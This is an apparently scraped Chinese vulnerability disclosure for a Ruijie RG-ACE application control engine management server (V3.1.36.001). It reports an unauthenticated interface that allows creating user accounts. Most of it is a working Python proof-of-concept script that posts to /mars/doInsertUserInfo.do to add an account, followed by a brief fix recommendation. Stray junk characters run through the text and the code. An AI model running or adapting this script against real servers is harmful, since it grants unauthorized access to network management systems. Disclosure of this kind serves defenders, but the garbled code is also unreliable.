锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）


测试的具体版本是
  i1 n8 |, S7 A- S; ~0 V产品名称: 锐捷应用控制引擎
2 |& t% c3 C. c版本号: 3.1.36.001 TC
: |+ P, m4 c; H* L编译时间: 201104291730
7 ?# O9 O+ V3 D2 _7 m( T0 k

9 W# O+ B+ `9 {  n漏洞证明：


) B1 ]$ o# F, S* H8 `' _



执行脚本
1 m4 m1 e* T; @! j& K( E# c* [8 Z#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
' g4 `. _# C. t0 S' Bimport urllib2, urllib,cookielib
: a3 ^5 H2 i6 N% q2 Turl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
- b! p5 W! f# H/ h) D% Z; ^/ s& I  S' Lopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
/ B+ V: o+ G4 t5 q+ x("useractionname","addButtonValue"),
; J1 s' @, ?) V& S("useropermanager","userManager"),
/ s' x; }2 M# }("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
; t% d- Z: b, c' d- ]+ _("trueName","ad"),
("email",""),
9 D; {* m7 W- [/ M9 @("mobilePhone",""),
("officePhone",""),
; t) `! V2 N3 g2 K. c7 r("addr",""),
("submit","确定"))
; u% K* }; n# q2 a1 w# Y  durllib2.install_opener(opener)
/ L" x0 J. K3 N# t5 |2 Pp=urllib2.urlopen(url, urllib.urlencode(post)).read()
9 A/ I0 O1 z5 fprint "Done"
# S' |2 }* K  P$ f) D" t$ F* {
登录，连接设备

2 E  b( [! A- Z7 P$ K- x$ d



4 d2 s1 W# d4 h0 U- g7 _默认的管理员admin权限更大点

( J6 a7 s* T, ^3 [

; \) w% I/ ]; b$ r9 x/ y

修复方案：
0 U7 h9 Z; q4 R' j. P加强对接口的权限验证
# e! P! f* h/ {" q0 n